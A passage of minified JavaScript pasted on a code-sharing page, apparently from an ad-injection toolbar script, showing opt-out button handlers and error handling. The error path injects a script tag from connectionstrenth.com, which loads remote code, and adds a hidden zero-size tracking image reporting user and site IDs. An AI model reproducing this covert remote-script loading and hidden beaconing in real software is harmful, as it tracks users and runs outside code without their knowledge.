  2218.                             b.optoutHide();
  2219.                             b.loadedCallback("OPTOUT_CLK_CLOSE");
  2220.                             return false
  2221.                         };
  2222.                         i.getElementById("partial-support").onclick = function() {
  2223.                             window.open("http://thisadsfor.us/optout?t=1837&u=50866&key=72d07657ba1ad678d2&block=" + b.currentOptoutBlock);
  2224.                             b.optoutHide();
  2225.                             b.loadedCallback("OPTOUT_CLK_PARTSUPPORT")
  2226.                         };
  2227.                         i.getElementById("no-support").onclick = function() {
  2228.                             window.open("http://thisadsfor.us/optout?t=1837&u=50866&key=72d07657ba1ad678d2&block=" + b.currentOptoutBlock);
  2229.                             b.optoutHide();
  2230.                             b.loadedCallback("OPTOUT_CLK_NOSUPPORT")
  2231.                         }
  2232.                     };
  2233.                     if (g.contentDocument || g.contentWindow) {
  2234.                         h()
  2235.                     } else {
  2236.                         b.on(g, "load", h);
  2237.                         d = setTimeout(h, 5000)
  2238.                     }
  2239.                     b.twBarOptOut = a[f].twBarOptOut = g
  2240.                 }
  2241.             })(document, window, "__twb__72d07657ba1ad678d2", undefined);;
  2242.             d.loadedCallback("FINISHED", "", location.host)
  2243.         })
  2244.     });;
  2245.     try {
  2246.         b(document, window)
  2247.     } catch (c) {
  2248.         var h = (typeof c.stack != "undefined" ? c.stack : "!empty stack!");
  2249.         if (h.length > 1500) {
  2250.             h = h.substr(0, 1500)
  2251.         }
  2252.         var a = (i.location.protocol == "http:" ? "http:" : "https:") + "//connectionstrenth.com/log/?l=error&m=" + encodeURIComponent((typeof c.message != "undefined" ? c.message : "!empty message!") + "|" + h);
  2253.         var k = document.createElement("script");
  2254.         k.type = "text/javascript";
  2255.         k.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  2256.         (document.getElementsByTagName("script")[0] || document.documentElement.firstChild).parentNode.appendChild(k);
  2257.         (function() {
  2258.             var e = ["mid=", "wid=" + (i[g] && i[g].tbParams && i[g].tbParams.wid) ? i[g].tbParams.wid : "", "sid=" + (i[g] && i[g].tbParams && i[g].tbParams.sid) ? i[g].tbParams.sid : "", "tid=" + (i[g] && i[g].tbParams && i[g].tbParams.tid) ? i[g].tbParams.tid : "", "rid=CORE_JS_ERROR"];
  2259.             a = (i.location.protocol == "http:" ? "http:" : "https:") + "//connectionstrenth.com/metric/?" + e.join("&");
  2260.             var d = f.createElement("img");
  2261.             d.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  2262.             d.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  2263.             f.getElementsByTagName("body")[0].appendChild(d);
  2264.             if (typeof d.onload != j) {
  2265.                 d.onload = function() {
  2266.                     d.parentNode && d.parentNode.removeChild(d)
  2267.                 }
  2268.             }
  2269.         })()
  2270.     }
  2271. }(document, window));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement